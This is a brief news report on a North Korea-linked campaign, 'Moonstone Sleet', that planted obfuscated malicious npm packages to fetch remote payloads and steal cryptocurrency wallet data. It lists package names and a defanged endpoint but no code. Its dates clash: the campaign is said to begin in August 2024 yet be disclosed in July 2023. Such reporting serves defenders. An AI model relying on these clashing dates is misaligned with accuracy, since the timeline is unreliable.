North Korea-Linked 'Moonstone Sleet' Cyber Campaign Targets npm Ecosystem
A sophisticated cyber campaign, dubbed 'Moonstone Sleet', has been targeting the npm ecosystem. It began on August 12, 2024, with malicious packages designed to infiltrate developer environments and steal sensitive data.
The campaign, linked to North Korean threat groups, has seen a recent surge in activity. It involves publishing malicious npm packages that insert JavaScript code to retrieve and execute malicious scripts from remote endpoints like ipcheck[.]cloud.
The packages, including temp-etherscan-api, etherscan-api, and telegram-con, use multi-stage obfuscated JavaScript. The most recent package, sass-notification, published on August 27, 2024, is linked to this campaign. It runs scripts that download, decrypt, and execute remote payloads, including Python scripts and a full Python interpreter. These scripts search for data in cryptocurrency wallet browser extensions and establish persistence on affected systems.
Microsoft first published the discovery of this coordinated campaign in July 2023. The qq-console package is attributed to a known North Korean campaign named 'Contagious Interview'.
The 'Moonstone Sleet' campaign highlights the increasing exploitation of npm by threat actors to compromise developer systems. It underscores the need for vigilance and robust security measures in the npm ecosystem.
